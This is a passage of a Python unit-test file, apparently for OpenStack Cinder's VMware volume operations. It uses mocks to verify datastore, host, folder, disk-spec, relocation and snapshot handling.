    retrieve_result2.objects = [vm('1'), vm('2'), vm('3')]
    self.session.invoke_api.return_value = retrieve_result2
    self.vops.continue_retrieval = mock.Mock(spec=object)
    self.vops.continue_retrieval.return_value = retrieve_result
    result = self.vops.get_backing(name)
    self.assertEqual(mock.sentinel.vm_obj, result)
    self.session.invoke_api.assert_called_with(vim_util, 'get_objects',
                                               self.session.vim,
                                               'VirtualMachine',
                                               self.MAX_OBJECTS)
    self.vops.continue_retrieval.assert_called_once_with(retrieve_result2)
    self.vops.cancel_retrieval.assert_called_with(retrieve_result)
def test_delete_backing(self):
    """Verify delete_backing destroys the VM and waits on the task."""
    backing = mock.sentinel.backing
    task = mock.sentinel.task
    self.session.invoke_api.return_value = task
    self.vops.delete_backing(backing)
    self.session.invoke_api.assert_called_once_with(self.session.vim,
                                                    "Destroy_Task",
                                                    backing)
    # BUG FIX: the original line merely *called* the mock
    # (``self.session.wait_for_task(task)``), asserting nothing.
    # Assert that delete_backing itself waited on the returned task.
    self.session.wait_for_task.assert_called_once_with(task)
def test_get_host(self):
    """Verify get_host fetches the 'runtime.host' property of a VM."""
    instance = mock.sentinel.instance
    host = mock.sentinel.host
    self.session.invoke_api.return_value = host
    result = self.vops.get_host(instance)
    self.assertEqual(host, result)
    self.session.invoke_api.assert_called_once_with(vim_util,
                                                    'get_object_property',
                                                    self.session.vim,
                                                    instance,
                                                    'runtime.host')
def test_get_hosts(self):
    """Verify get_hosts retrieves HostSystem objects."""
    hosts = mock.sentinel.hosts
    self.session.invoke_api.return_value = hosts
    result = self.vops.get_hosts()
    self.assertEqual(hosts, result)
    self.session.invoke_api.assert_called_once_with(vim_util,
                                                    'get_objects',
                                                    self.session.vim,
                                                    'HostSystem',
                                                    self.MAX_OBJECTS)
def test_continue_retrieval(self):
    """Verify continue_retrieval delegates to vim_util."""
    retrieve_result = mock.sentinel.retrieve_result
    self.session.invoke_api.return_value = retrieve_result
    result = self.vops.continue_retrieval(retrieve_result)
    self.assertEqual(retrieve_result, result)
    self.session.invoke_api.assert_called_once_with(vim_util,
                                                    'continue_retrieval',
                                                    self.session.vim,
                                                    retrieve_result)
def test_cancel_retrieval(self):
    """Verify cancel_retrieval delegates to vim_util and returns None."""
    retrieve_result = mock.sentinel.retrieve_result
    self.session.invoke_api.return_value = retrieve_result
    result = self.vops.cancel_retrieval(retrieve_result)
    self.assertIsNone(result)
    self.session.invoke_api.assert_called_once_with(vim_util,
                                                    'cancel_retrieval',
                                                    self.session.vim,
                                                    retrieve_result)
def test_is_usable(self):
    """Check _is_usable over mount-mode/mounted/accessible permutations."""
    mount_info = mock.Mock(spec=object)
    mount_info.accessMode = "readWrite"
    mount_info.mounted = True
    mount_info.accessible = True
    self.assertTrue(self.vops._is_usable(mount_info))
    # a missing 'mounted' attribute still counts as usable
    del mount_info.mounted
    self.assertTrue(self.vops._is_usable(mount_info))
    # read-only mounts are not usable
    mount_info.accessMode = "readonly"
    self.assertFalse(self.vops._is_usable(mount_info))
    mount_info.accessMode = "readWrite"
    mount_info.mounted = False
    self.assertFalse(self.vops._is_usable(mount_info))
    mount_info.mounted = True
    mount_info.accessible = False
    self.assertFalse(self.vops._is_usable(mount_info))
    # a missing 'accessible' attribute means not usable
    del mount_info.accessible
    self.assertFalse(self.vops._is_usable(mount_info))
def _create_host_mounts(self, access_mode, host, set_accessible=True,
is_accessible=True, mounted=True):
"""Create host mount value of datastore with single mount info.
:param access_mode: string specifying the read/write permission
:param set_accessible: specify whether accessible property
should be set
:param is_accessible: boolean specifying whether the datastore
is accessible to host
:param host: managed object reference of the connected
host
:return: list of host mount info
"""
mntInfo = mock.Mock(spec=object)
mntInfo.accessMode = access_mode
if set_accessible:
mntInfo.accessible = is_accessible
else:
del mntInfo.accessible
mntInfo.mounted = mounted
host_mount = mock.Mock(spec=object)
host_mount.key = host
host_mount.mountInfo = mntInfo
host_mounts = mock.Mock(spec=object)
host_mounts.DatastoreHostMount = [host_mount]
return host_mounts
def test_get_connected_hosts(self):
    """Verify get_connected_hosts for inaccessible/accessible datastores."""
    with mock.patch.object(self.vops, 'get_summary') as get_summary:
        datastore = mock.sentinel.datastore
        summary = mock.Mock(spec=object)
        get_summary.return_value = summary
        # an inaccessible datastore yields no hosts
        summary.accessible = False
        hosts = self.vops.get_connected_hosts(datastore)
        self.assertEqual([], hosts)
        summary.accessible = True
        host = mock.Mock(spec=object)
        host.value = mock.sentinel.host
        host_mounts = self._create_host_mounts("readWrite", host)
        self.session.invoke_api.return_value = host_mounts
        hosts = self.vops.get_connected_hosts(datastore)
        self.assertEqual([mock.sentinel.host], hosts)
        self.session.invoke_api.assert_called_once_with(
            vim_util,
            'get_object_property',
            self.session.vim,
            datastore,
            'host')
        # no DatastoreHostMount property -> no hosts
        del host_mounts.DatastoreHostMount
        hosts = self.vops.get_connected_hosts(datastore)
        self.assertEqual([], hosts)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            'get_connected_hosts')
def test_is_datastore_accessible(self, get_connected_hosts):
    """Datastore is accessible when the host is among its connected hosts."""
    host_1 = mock.sentinel.host_1
    host_2 = mock.sentinel.host_2
    get_connected_hosts.return_value = [host_1, host_2]
    ds = mock.sentinel.datastore
    host = mock.Mock(value=mock.sentinel.host_1)
    self.assertTrue(self.vops.is_datastore_accessible(ds, host))
    get_connected_hosts.assert_called_once_with(ds)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            'get_connected_hosts')
def test_is_datastore_accessible_with_inaccessible(self,
                                                   get_connected_hosts):
    """Datastore is inaccessible when the host is not connected to it."""
    host_1 = mock.sentinel.host_1
    get_connected_hosts.return_value = [host_1]
    ds = mock.sentinel.datastore
    host = mock.Mock(value=mock.sentinel.host_2)
    self.assertFalse(self.vops.is_datastore_accessible(ds, host))
    get_connected_hosts.assert_called_once_with(ds)
def test_is_valid(self):
    """Exercise _is_valid across mount/accessibility/maintenance cases."""
    with mock.patch.object(self.vops, 'get_summary') as get_summary:
        summary = mock.Mock(spec=object)
        get_summary.return_value = summary
        datastore = mock.sentinel.datastore
        host = mock.Mock(spec=object)
        host.value = mock.sentinel.host

        def _is_valid(host_mounts, is_valid):
            # run _is_valid with the given mounts, assert expected verdict
            self.session.invoke_api.return_value = host_mounts
            result = self.vops._is_valid(datastore, host)
            self.assertEqual(is_valid, result)
            self.session.invoke_api.assert_called_with(
                vim_util,
                'get_object_property',
                self.session.vim,
                datastore,
                'host')

        # Test positive cases
        summary.maintenanceMode = 'normal'
        summary.accessible = True
        _is_valid(self._create_host_mounts("readWrite", host), True)
        # Test negative cases
        _is_valid(self._create_host_mounts("Inaccessible", host), False)
        _is_valid(self._create_host_mounts("readWrite", host, True, False),
                  False)
        _is_valid(self._create_host_mounts("readWrite", host, True, True,
                                           False), False)
        summary.accessible = False
        _is_valid(self._create_host_mounts("readWrite", host, False),
                  False)
        summary.accessible = True
        summary.maintenanceMode = 'inMaintenance'
        _is_valid(self._create_host_mounts("readWrite", host), False)
def test_get_dss_rp(self):
    """Verify get_dss_rp returns a host's datastores and resource pool."""
    with mock.patch.object(self.vops, 'get_summary') as get_summary:
        summary = mock.Mock(spec=object)
        summary.accessible = True
        # BUG FIX: was 'summary.maintenanceModel' (typo); the attribute
        # consumed by the validity check — and set later in this test —
        # is 'maintenanceMode'.
        summary.maintenanceMode = 'normal'
        get_summary.return_value = summary
        # build out props to be returned by 1st invoke_api call
        datastore_prop = mock.Mock(spec=object)
        datastore_prop.name = 'datastore'
        datastore_prop.val = mock.Mock(spec=object)
        datastore_prop.val.ManagedObjectReference = [mock.sentinel.ds1,
                                                     mock.sentinel.ds2]
        compute_resource_prop = mock.Mock(spec=object)
        compute_resource_prop.name = 'parent'
        compute_resource_prop.val = mock.sentinel.compute_resource
        elem = mock.Mock(spec=object)
        elem.propSet = [datastore_prop, compute_resource_prop]
        props = [elem]
        # build out host_mounts to be returned by 2nd invoke_api call
        host = mock.Mock(spec=object)
        host.value = mock.sentinel.host
        host_mounts = self._create_host_mounts("readWrite", host)
        # build out resource_pool to be returned by 3rd invoke_api call
        resource_pool = mock.sentinel.resource_pool
        # set return values for each call of invoke_api
        self.session.invoke_api.side_effect = [props,
                                               host_mounts,
                                               host_mounts,
                                               resource_pool]
        # invoke function and verify results
        (dss_actual, rp_actual) = self.vops.get_dss_rp(host)
        self.assertEqual([mock.sentinel.ds1, mock.sentinel.ds2],
                         dss_actual)
        self.assertEqual(resource_pool, rp_actual)
        # invoke function with no valid datastore
        summary.maintenanceMode = 'inMaintenance'
        self.session.invoke_api.side_effect = [props,
                                               host_mounts,
                                               host_mounts,
                                               resource_pool]
        self.assertRaises(exceptions.VimException,
                          self.vops.get_dss_rp,
                          host)
        # Clear side effects.
        self.session.invoke_api.side_effect = None
def test_get_parent(self):
    """Verify _get_parent returns the node itself or walks up the tree."""
    # Not recursive
    child = mock.Mock(spec=object)
    child._type = 'Parent'
    ret = self.vops._get_parent(child, 'Parent')
    self.assertEqual(child, ret)
    # Recursive
    parent = mock.Mock(spec=object)
    parent._type = 'Parent'
    child = mock.Mock(spec=object)
    child._type = 'Child'
    self.session.invoke_api.return_value = parent
    ret = self.vops._get_parent(child, 'Parent')
    self.assertEqual(parent, ret)
    self.session.invoke_api.assert_called_with(vim_util,
                                               'get_object_property',
                                               self.session.vim, child,
                                               'parent')
def test_get_dc(self):
    """Verify get_dc climbs the parent chain up to the Datacenter."""
    # set up hierarchy of objects
    dc = mock.Mock(spec=object)
    dc._type = 'Datacenter'
    o1 = mock.Mock(spec=object)
    o1._type = 'mockType1'
    o1.parent = dc
    o2 = mock.Mock(spec=object)
    o2._type = 'mockType2'
    o2.parent = o1

    # mock out invoke_api behaviour to fetch parent
    def mock_invoke_api(vim_util, method, vim, the_object, arg):
        return the_object.parent

    self.session.invoke_api.side_effect = mock_invoke_api
    ret = self.vops.get_dc(o2)
    self.assertEqual(dc, ret)
    # Clear side effects.
    self.session.invoke_api.side_effect = None
def test_get_vmfolder(self):
    """Verify get_vmfolder fetches the datacenter's 'vmFolder' property."""
    self.session.invoke_api.return_value = mock.sentinel.ret
    ret = self.vops.get_vmfolder(mock.sentinel.dc)
    self.assertEqual(mock.sentinel.ret, ret)
    self.session.invoke_api.assert_called_once_with(vim_util,
                                                    'get_object_property',
                                                    self.session.vim,
                                                    mock.sentinel.dc,
                                                    'vmFolder')
def test_create_folder_with_concurrent_create(self):
    """A DuplicateName during CreateFolder falls back to re-reading children."""
    parent_folder = mock.sentinel.parent_folder
    child_name = 'child_folder'
    # first read: no children; CreateFolder raises because another caller
    # created the folder concurrently; second read finds it
    prop_val_1 = mock.Mock(ManagedObjectReference=[])
    child_folder = mock.Mock(_type='Folder')
    prop_val_2 = mock.Mock(ManagedObjectReference=[child_folder])
    self.session.invoke_api.side_effect = [prop_val_1,
                                           exceptions.DuplicateName,
                                           prop_val_2,
                                           child_name]
    ret = self.vops.create_folder(parent_folder, child_name)
    self.assertEqual(child_folder, ret)
    expected_invoke_api = [mock.call(vim_util, 'get_object_property',
                                     self.session.vim, parent_folder,
                                     'childEntity'),
                           mock.call(self.session.vim, 'CreateFolder',
                                     parent_folder, name=child_name),
                           mock.call(vim_util, 'get_object_property',
                                     self.session.vim, parent_folder,
                                     'childEntity'),
                           mock.call(vim_util, 'get_object_property',
                                     self.session.vim, child_folder,
                                     'name')]
    self.assertEqual(expected_invoke_api,
                     self.session.invoke_api.mock_calls)
def test_create_folder_with_empty_vmfolder(self):
    """Test create_folder when the datacenter vmFolder is empty"""
    child_folder = mock.sentinel.child_folder
    # None simulates a folder with no 'childEntity' property at all
    self.session.invoke_api.side_effect = [None, child_folder]
    parent_folder = mock.sentinel.parent_folder
    child_name = 'child_folder'
    ret = self.vops.create_folder(parent_folder, child_name)
    self.assertEqual(child_folder, ret)
    expected_calls = [mock.call(vim_util, 'get_object_property',
                                self.session.vim, parent_folder,
                                'childEntity'),
                      mock.call(self.session.vim, 'CreateFolder',
                                parent_folder, name=child_name)]
    self.assertEqual(expected_calls,
                     self.session.invoke_api.call_args_list)
def test_create_folder_not_present(self):
    """Test create_folder when child not present."""
    parent_folder = mock.sentinel.parent_folder
    child_name = 'child_folder'
    # parent has a childEntity property, but no children in it
    prop_val = mock.Mock(spec=object)
    prop_val.ManagedObjectReference = []
    child_folder = mock.sentinel.child_folder
    self.session.invoke_api.side_effect = [prop_val, child_folder]
    ret = self.vops.create_folder(parent_folder, child_name)
    self.assertEqual(child_folder, ret)
    expected_invoke_api = [mock.call(vim_util, 'get_object_property',
                                     self.session.vim, parent_folder,
                                     'childEntity'),
                           mock.call(self.session.vim, 'CreateFolder',
                                     parent_folder, name=child_name)]
    self.assertEqual(expected_invoke_api,
                     self.session.invoke_api.mock_calls)
    # Clear side effects.
    self.session.invoke_api.side_effect = None
def test_create_folder_already_present(self):
    """Test create_folder when child already present."""
    parent_folder = mock.sentinel.parent_folder
    child_name = 'child_folder'
    prop_val = mock.Mock(spec=object)
    # two existing Folder children; only the second matches by name
    child_entity_1 = mock.Mock(spec=object)
    child_entity_1._type = 'Folder'
    child_entity_1_name = 'SomeOtherName'
    child_entity_2 = mock.Mock(spec=object)
    child_entity_2._type = 'Folder'
    child_entity_2_name = child_name
    prop_val.ManagedObjectReference = [child_entity_1, child_entity_2]
    self.session.invoke_api.side_effect = [prop_val, child_entity_1_name,
                                           child_entity_2_name]
    ret = self.vops.create_folder(parent_folder, child_name)
    self.assertEqual(child_entity_2, ret)
    expected_invoke_api = [mock.call(vim_util, 'get_object_property',
                                     self.session.vim, parent_folder,
                                     'childEntity'),
                           mock.call(vim_util, 'get_object_property',
                                     self.session.vim, child_entity_1,
                                     'name'),
                           mock.call(vim_util, 'get_object_property',
                                     self.session.vim, child_entity_2,
                                     'name')]
    self.assertEqual(expected_invoke_api,
                     self.session.invoke_api.mock_calls)
    # Clear side effects.
    self.session.invoke_api.side_effect = None
def test_create_folder_with_special_characters(self):
    """Test create_folder with names containing special characters."""
    # Test folder already exists case.
    # existing folder names are returned percent-encoded ('/' -> '%2f'),
    # so a request for '/cinder-volumes' must match '%2fcinder-volumes'
    child_entity_1 = mock.Mock(_type='Folder')
    child_entity_1_name = 'cinder-volumes'
    child_entity_2 = mock.Mock(_type='Folder')
    child_entity_2_name = '%2fcinder-volumes'
    prop_val = mock.Mock(ManagedObjectReference=[child_entity_1,
                                                 child_entity_2])
    self.session.invoke_api.side_effect = [prop_val,
                                           child_entity_1_name,
                                           child_entity_2_name]
    parent_folder = mock.sentinel.parent_folder
    child_name = '/cinder-volumes'
    ret = self.vops.create_folder(parent_folder, child_name)
    self.assertEqual(child_entity_2, ret)
    # Test non-existing folder case.
    child_entity_2_name = '%25%25cinder-volumes'
    new_child_folder = mock.sentinel.new_child_folder
    self.session.invoke_api.side_effect = [prop_val,
                                           child_entity_1_name,
                                           child_entity_2_name,
                                           new_child_folder]
    child_name = '%cinder-volumes'
    ret = self.vops.create_folder(parent_folder, child_name)
    self.assertEqual(new_child_folder, ret)
    self.session.invoke_api.assert_called_with(self.session.vim,
                                               'CreateFolder',
                                               parent_folder,
                                               name=child_name)
    # Reset side effects.
    self.session.invoke_api.side_effect = None
def test_create_disk_backing_thin(self):
    """Verify backing spec for a thin-provisioned disk."""
    backing = mock.Mock()
    # deleting the attribute mimics a backing object without that field
    del backing.eagerlyScrub
    cf = self.session.vim.client.factory
    cf.create.return_value = backing
    disk_type = 'thin'
    ret = self.vops._create_disk_backing(disk_type, None)
    self.assertEqual(backing, ret)
    self.assertIsInstance(ret.thinProvisioned, bool)
    self.assertTrue(ret.thinProvisioned)
    self.assertEqual('', ret.fileName)
    self.assertEqual('persistent', ret.diskMode)
def test_create_disk_backing_thick(self):
    """A 'thick' backing sets neither eagerlyScrub nor thinProvisioned."""
    fake_backing = mock.Mock()
    # Emulate a suds object lacking both provisioning attributes.
    del fake_backing.eagerlyScrub
    del fake_backing.thinProvisioned
    self.session.vim.client.factory.create.return_value = fake_backing
    result = self.vops._create_disk_backing('thick', None)
    self.assertEqual(fake_backing, result)
    self.assertEqual('', result.fileName)
    self.assertEqual('persistent', result.diskMode)
def test_create_disk_backing_eager_zeroed_thick(self):
    """An 'eagerZeroedThick' backing must set the eagerlyScrub flag."""
    fake_backing = mock.Mock()
    # Emulate a suds object with no thinProvisioned attribute.
    del fake_backing.thinProvisioned
    self.session.vim.client.factory.create.return_value = fake_backing
    result = self.vops._create_disk_backing('eagerZeroedThick', None)
    self.assertEqual(fake_backing, result)
    self.assertIsInstance(result.eagerlyScrub, bool)
    self.assertTrue(result.eagerlyScrub)
    self.assertEqual('', result.fileName)
    self.assertEqual('persistent', result.diskMode)
def test_create_virtual_disk_config_spec(self):
    """Verify the device config spec built by _create_virtual_disk_config_spec."""
    cf = self.session.vim.client.factory
    # Each factory.create() call must yield a distinct Mock object.
    cf.create.side_effect = lambda *args: mock.Mock()
    size_kb = units.Ki
    controller_key = 200
    disk_type = 'thick'
    spec = self.vops._create_virtual_disk_config_spec(size_kb,
                                                      disk_type,
                                                      controller_key,
                                                      None)
    cf.create.side_effect = None
    self.assertEqual('add', spec.operation)
    self.assertEqual('create', spec.fileOperation)
    device = spec.device
    self.assertEqual(size_kb, device.capacityInKB)
    # -101 is the temporary device key used for a not-yet-created disk.
    self.assertEqual(-101, device.key)
    self.assertEqual(0, device.unitNumber)
    self.assertEqual(controller_key, device.controllerKey)
    backing = device.backing
    self.assertEqual('', backing.fileName)
    self.assertEqual('persistent', backing.diskMode)
def test_create_specs_for_ide_disk_add(self):
    """A disk add on the IDE adapter yields a single (disk-only) spec."""
    factory = self.session.vim.client.factory
    factory.create.side_effect = lambda *args: mock.Mock()
    size_kb = 1
    disk_type = 'thin'
    adapter_type = 'ide'
    ret = self.vops._create_specs_for_disk_add(size_kb, disk_type,
                                               adapter_type)
    factory.create.side_effect = None
    self.assertEqual(1, len(ret))
    # NOTE(review): the 1 KB request appears as units.Ki in the spec --
    # presumably rounded up by _create_specs_for_disk_add; confirm there.
    self.assertEqual(units.Ki, ret[0].device.capacityInKB)
    # 200 is the key of the default IDE controller (no new controller spec).
    self.assertEqual(200, ret[0].device.controllerKey)
    expected = [mock.call.create('ns0:VirtualDeviceConfigSpec'),
                mock.call.create('ns0:VirtualDisk'),
                mock.call.create('ns0:VirtualDiskFlatVer2BackingInfo')]
    factory.create.assert_has_calls(expected, any_order=True)
def test_create_specs_for_scsi_disk_add(self):
    """A disk add on a SCSI adapter also creates a controller spec."""
    factory = self.session.vim.client.factory
    factory.create.side_effect = lambda *args: mock.Mock()
    size_kb = 2 * units.Ki
    disk_type = 'thin'
    adapter_type = 'lsiLogicsas'
    ret = self.vops._create_specs_for_disk_add(size_kb, disk_type,
                                               adapter_type)
    factory.create.side_effect = None
    # Two specs: one for the disk, one for the new SCSI controller.
    self.assertEqual(2, len(ret))
    self.assertEqual('noSharing', ret[1].device.sharedBus)
    self.assertEqual(size_kb, ret[0].device.capacityInKB)
    expected = [mock.call.create('ns0:VirtualLsiLogicSASController'),
                mock.call.create('ns0:VirtualDeviceConfigSpec'),
                mock.call.create('ns0:VirtualDisk'),
                mock.call.create('ns0:VirtualDiskFlatVer2BackingInfo'),
                mock.call.create('ns0:VirtualDeviceConfigSpec')]
    factory.create.assert_has_calls(expected, any_order=True)
def test_get_create_spec_disk_less(self):
    """Verify the VM create spec built by _get_create_spec_disk_less."""
    factory = self.session.vim.client.factory
    factory.create.side_effect = lambda *args: mock.Mock()
    name = mock.sentinel.name
    ds_name = mock.sentinel.ds_name
    profile_id = mock.sentinel.profile_id
    option_key = mock.sentinel.key
    option_value = mock.sentinel.value
    extra_config = {option_key: option_value}
    ret = self.vops._get_create_spec_disk_less(name, ds_name, profile_id,
                                               extra_config)
    factory.create.side_effect = None
    self.assertEqual(name, ret.name)
    # A disk-less VM's path is just its datastore, e.g. '[ds1]'.
    self.assertEqual('[%s]' % ds_name, ret.files.vmPathName)
    self.assertEqual("vmx-08", ret.version)
    self.assertEqual(profile_id, ret.vmProfile[0].profileId)
    # extra_config entries are translated into OptionValue objects.
    self.assertEqual(1, len(ret.extraConfig))
    self.assertEqual(option_key, ret.extraConfig[0].key)
    self.assertEqual(option_value, ret.extraConfig[0].value)
    expected = [mock.call.create('ns0:VirtualMachineFileInfo'),
                mock.call.create('ns0:VirtualMachineConfigSpec'),
                mock.call.create('ns0:VirtualMachineDefinedProfileSpec'),
                mock.call.create('ns0:OptionValue')]
    factory.create.assert_has_calls(expected, any_order=True)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            '_get_create_spec_disk_less')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            '_create_specs_for_disk_add')
def test_get_create_spec(self, create_specs_for_disk_add,
                         get_create_spec_disk_less):
    """get_create_spec should combine the disk-less spec with disk-add specs."""
    name = 'vol-1'
    size_kb = 1024
    disk_type = 'thin'
    ds_name = 'nfs-1'
    profileId = mock.sentinel.profile_id
    adapter_type = 'busLogic'
    extra_config = mock.sentinel.extra_config
    self.vops.get_create_spec(name, size_kb, disk_type, ds_name,
                              profileId, adapter_type, extra_config)
    get_create_spec_disk_less.assert_called_once_with(
        name, ds_name, profileId=profileId, extra_config=extra_config)
    create_specs_for_disk_add.assert_called_once_with(
        size_kb, disk_type, adapter_type)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            'get_create_spec')
def test_create_backing(self, get_create_spec):
    """create_backing should run CreateVM_Task and return the task result."""
    create_spec = mock.sentinel.create_spec
    get_create_spec.return_value = create_spec
    task = mock.sentinel.task
    self.session.invoke_api.return_value = task
    # spec=object so only explicitly assigned attributes exist.
    task_info = mock.Mock(spec=object)
    task_info.result = mock.sentinel.result
    self.session.wait_for_task.return_value = task_info
    name = 'backing_name'
    size_kb = mock.sentinel.size_kb
    disk_type = mock.sentinel.disk_type
    adapter_type = mock.sentinel.adapter_type
    folder = mock.sentinel.folder
    resource_pool = mock.sentinel.resource_pool
    host = mock.sentinel.host
    ds_name = mock.sentinel.ds_name
    profile_id = mock.sentinel.profile_id
    extra_config = mock.sentinel.extra_config
    ret = self.vops.create_backing(name, size_kb, disk_type, folder,
                                   resource_pool, host, ds_name,
                                   profile_id, adapter_type, extra_config)
    self.assertEqual(mock.sentinel.result, ret)
    get_create_spec.assert_called_once_with(
        name, size_kb, disk_type, ds_name, profileId=profile_id,
        adapter_type=adapter_type, extra_config=extra_config)
    self.session.invoke_api.assert_called_once_with(self.session.vim,
                                                    'CreateVM_Task',
                                                    folder,
                                                    config=create_spec,
                                                    pool=resource_pool,
                                                    host=host)
    self.session.wait_for_task.assert_called_once_with(task)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            '_get_create_spec_disk_less')
def test_create_backing_disk_less(self, get_create_spec_disk_less):
    """create_backing_disk_less should create a VM without any disk."""
    create_spec = mock.sentinel.create_spec
    get_create_spec_disk_less.return_value = create_spec
    task = mock.sentinel.task
    self.session.invoke_api.return_value = task
    task_info = mock.Mock(spec=object)
    task_info.result = mock.sentinel.result
    self.session.wait_for_task.return_value = task_info
    name = 'backing_name'
    folder = mock.sentinel.folder
    resource_pool = mock.sentinel.resource_pool
    host = mock.sentinel.host
    ds_name = mock.sentinel.ds_name
    profile_id = mock.sentinel.profile_id
    extra_config = mock.sentinel.extra_config
    ret = self.vops.create_backing_disk_less(name, folder, resource_pool,
                                             host, ds_name, profile_id,
                                             extra_config)
    self.assertEqual(mock.sentinel.result, ret)
    get_create_spec_disk_less.assert_called_once_with(
        name, ds_name, profileId=profile_id, extra_config=extra_config)
    self.session.invoke_api.assert_called_once_with(self.session.vim,
                                                    'CreateVM_Task',
                                                    folder,
                                                    config=create_spec,
                                                    pool=resource_pool,
                                                    host=host)
    self.session.wait_for_task.assert_called_once_with(task)
def test_get_datastore(self):
    """get_datastore should return the backing's first datastore ref."""
    vm = mock.sentinel.backing
    ds_prop = mock.Mock(spec=object)
    ds_prop.ManagedObjectReference = [mock.sentinel.ds]
    self.session.invoke_api.return_value = ds_prop
    result = self.vops.get_datastore(vm)
    self.assertEqual(mock.sentinel.ds, result)
    self.session.invoke_api.assert_called_once_with(
        vim_util, 'get_object_property', self.session.vim, vm, 'datastore')
def test_get_summary(self):
    """get_summary should read the 'summary' property of a datastore."""
    ds = mock.sentinel.datastore
    self.session.invoke_api.return_value = mock.sentinel.summary
    result = self.vops.get_summary(ds)
    self.assertEqual(mock.sentinel.summary, result)
    self.session.invoke_api.assert_called_once_with(
        vim_util, 'get_object_property', self.session.vim, ds, 'summary')
def test_get_relocate_spec(self):
    """Verify _get_relocate_spec with and without a disk locator."""
    # Flag read by the factory side effect below; toggled between the two
    # sub-cases so the created relocate spec does/doesn't carry 'disk'.
    delete_disk_attribute = True

    def _create_side_effect(type):
        # Emulate suds objects: delete attributes the real factory would
        # not define for the given type.
        obj = mock.Mock()
        if type == "ns0:VirtualDiskFlatVer2BackingInfo":
            del obj.eagerlyScrub
        elif (type == "ns0:VirtualMachineRelocateSpec" and
              delete_disk_attribute):
            del obj.disk
        else:
            pass
        return obj
    factory = self.session.vim.client.factory
    factory.create.side_effect = _create_side_effect
    datastore = mock.sentinel.datastore
    resource_pool = mock.sentinel.resource_pool
    host = mock.sentinel.host
    disk_move_type = mock.sentinel.disk_move_type
    # Case 1: no disk type/device -> plain relocate spec.
    ret = self.vops._get_relocate_spec(datastore, resource_pool, host,
                                       disk_move_type)
    self.assertEqual(datastore, ret.datastore)
    self.assertEqual(resource_pool, ret.pool)
    self.assertEqual(host, ret.host)
    self.assertEqual(disk_move_type, ret.diskMoveType)
    # Test with disk locator.
    delete_disk_attribute = False
    disk_type = 'thin'
    disk_device = mock.Mock()
    ret = self.vops._get_relocate_spec(datastore, resource_pool, host,
                                       disk_move_type, disk_type,
                                       disk_device)
    factory.create.side_effect = None
    self.assertEqual(datastore, ret.datastore)
    self.assertEqual(resource_pool, ret.pool)
    self.assertEqual(host, ret.host)
    self.assertEqual(disk_move_type, ret.diskMoveType)
    self.assertIsInstance(ret.disk, list)
    self.assertEqual(1, len(ret.disk))
    disk_locator = ret.disk[0]
    self.assertEqual(datastore, disk_locator.datastore)
    self.assertEqual(disk_device.key, disk_locator.diskId)
    backing = disk_locator.diskBackingInfo
    self.assertIsInstance(backing.thinProvisioned, bool)
    self.assertTrue(backing.thinProvisioned)
    self.assertEqual('', backing.fileName)
    self.assertEqual('persistent', backing.diskMode)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            '_get_disk_device')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            '_get_relocate_spec')
def test_relocate_backing(self, get_relocate_spec, get_disk_device):
    """relocate_backing should build a relocate spec and run RelocateVM_Task."""
    disk_device = mock.sentinel.disk_device
    get_disk_device.return_value = disk_device
    spec = mock.sentinel.relocate_spec
    get_relocate_spec.return_value = spec
    task = mock.sentinel.task
    self.session.invoke_api.return_value = task
    backing = mock.sentinel.backing
    datastore = mock.sentinel.datastore
    resource_pool = mock.sentinel.resource_pool
    host = mock.sentinel.host
    disk_type = mock.sentinel.disk_type
    self.vops.relocate_backing(backing, datastore, resource_pool, host,
                               disk_type)
    # Verify calls
    disk_move_type = 'moveAllDiskBackingsAndAllowSharing'
    get_disk_device.assert_called_once_with(backing)
    get_relocate_spec.assert_called_once_with(datastore, resource_pool,
                                              host, disk_move_type,
                                              disk_type, disk_device)
    self.session.invoke_api.assert_called_once_with(self.session.vim,
                                                    'RelocateVM_Task',
                                                    backing,
                                                    spec=spec)
    self.session.wait_for_task.assert_called_once_with(task)
def test_move_backing_to_folder(self):
    """move_backing_to_folder should run MoveIntoFolder_Task and wait."""
    task = mock.sentinel.task
    self.session.invoke_api.return_value = task
    vm = mock.sentinel.backing
    dest_folder = mock.sentinel.folder
    self.vops.move_backing_to_folder(vm, dest_folder)
    # The task is invoked on the destination folder with the VM as payload.
    self.session.invoke_api.assert_called_once_with(
        self.session.vim, 'MoveIntoFolder_Task', dest_folder, list=[vm])
    self.session.wait_for_task.assert_called_once_with(task)
def test_create_snapshot_operation(self):
    """create_snapshot should run CreateSnapshot_Task and return its result."""
    task = mock.sentinel.task
    self.session.invoke_api.return_value = task
    task_info = mock.Mock(spec=object)
    task_info.result = mock.sentinel.result
    self.session.wait_for_task.return_value = task_info
    backing = mock.sentinel.backing
    name = mock.sentinel.name
    desc = mock.sentinel.description
    quiesce = True
    ret = self.vops.create_snapshot(backing, name, desc, quiesce)
    self.assertEqual(mock.sentinel.result, ret)
    # memory=False: volume snapshots never capture VM memory.
    self.session.invoke_api.assert_called_once_with(self.session.vim,
                                                    'CreateSnapshot_Task',
                                                    backing, name=name,
                                                    description=desc,
                                                    memory=False,
                                                    quiesce=quiesce)
    self.session.wait_for_task.assert_called_once_with(task)
def test_get_snapshot_from_tree(self):
    """Exercise _get_snapshot_from_tree over the tree-walk corner cases."""
    volops = volumeops.VMwareVolumeOps
    name = mock.sentinel.name
    # Test snapshot == 'None'
    ret = volops._get_snapshot_from_tree(name, None)
    self.assertIsNone(ret)
    # Test root == snapshot
    snapshot = mock.sentinel.snapshot
    node = mock.Mock(spec=object)
    node.name = name
    node.snapshot = snapshot
    ret = volops._get_snapshot_from_tree(name, node)
    self.assertEqual(snapshot, ret)
    # Test root.childSnapshotList == None
    root = mock.Mock(spec=object)
    root.name = 'root'
    # Emulate a node with no children attribute at all.
    del root.childSnapshotList
    ret = volops._get_snapshot_from_tree(name, root)
    self.assertIsNone(ret)
    # Test root.child == snapshot
    root.childSnapshotList = [node]
    ret = volops._get_snapshot_from_tree(name, root)
    self.assertEqual(snapshot, ret)
